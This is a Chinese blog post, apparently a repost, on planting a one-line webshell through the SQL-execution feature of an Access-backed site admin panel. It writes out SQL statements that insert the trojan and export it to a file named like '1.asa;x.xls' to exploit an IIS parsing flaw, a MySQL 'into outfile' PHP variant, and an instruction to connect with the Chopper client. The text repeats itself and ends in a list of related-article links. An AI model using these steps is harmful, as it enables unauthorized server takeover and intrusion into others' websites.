ACCESS执行SQL语句导出一句话拿webshell
2013-01-03 10:49
746 查看
实用环境,在Access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。
逐一执行以下语句就可以导出一句话了
第一句代码
第二句代码
第三句代码
第四句代码
直接菜刀里连接http://www.mumaasp.com/1.asa;x.xls
SQL语句意思解释:
第一句
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
第二句
在表cmd的a字段插入一句话木马
第三句
把cmd表a的内容导出到路径e:\web\mumaasp\的EXCEL文件
第四句
删除建立的cmd表
以下内容为测试:
Access利用后台SQL执行命令功能导出WebShell:
这个更简单:
后台有执行SQL语句功能(vote为已知表段)
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。
逐一执行以下语句就可以导出一句话了
第一句代码
create table cmd (a varchar(50))
第二句代码
insert into cmd (a) values ('一句话木马')
第三句代码
select * into [a] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 4.0;' from cmd
第四句代码
drop table cmd
直接菜刀里连接http://www.mumaasp.com/1.asa;x.xls
SQL语句意思解释:
第一句
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
第二句
在表cmd的a字段插入一句话木马
第三句
把cmd表a的内容导出到路径e:\web\mumaasp\的EXCEL文件
第四句
删除建立的cmd表
以下内容为测试:
Access利用后台SQL执行命令功能导出WebShell:
这个更简单:
Select 'asp一句话木马' into [vote] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 8.0;' from vote或者
Select 'php一句话木马' into outfile 'F:/wwwroot/mumaasp.com/eval.php';
后台有执行SQL语句功能(vote为已知表段)
相关文章推荐
- ACCESS执行SQL语句导出一句话拿webshell
- ACCESS执行SQL语句导出一句话拿webshell
- Oracle采用存储过程执行sql语句,将查询到的数据导出到EXCEL中
- SQL语句导入导出大全,包括excel,access
- SQL语句导入导出大全,包括excel,access
- 将eclipse中的表视图导出成为sql文件。可执行sql建表建视图语句。进度条显示
- access 如何执行sql语句
- Access中执行SQL语句时的一些总结 .
- MySQL/ACCESS导出一句话拿WebShell后门命令
- 导出单个或多个表的SQL语句在DOS下执行
- ACCESS表与CSV文件相互导入、导出的SQL语句
- ACCESS数据库后台sql语句执行导webshell
- 在Access中执行SQL语句
- 如何在ACCESS软件里执行SQL语句
- 对access执行带参数的sql语句
- 在Access查询中执行SQL语句
- [access查询]将access表导出为TXT文件及将TXT文件导入access表的几个SQL语句
- access中sql语句执行错误 “标准表达式中数据类型不匹配”
- Access学习要点2----Access2010中如何运行SQL执行SQL语句
- SQL语句导入导出大全,包括excel,access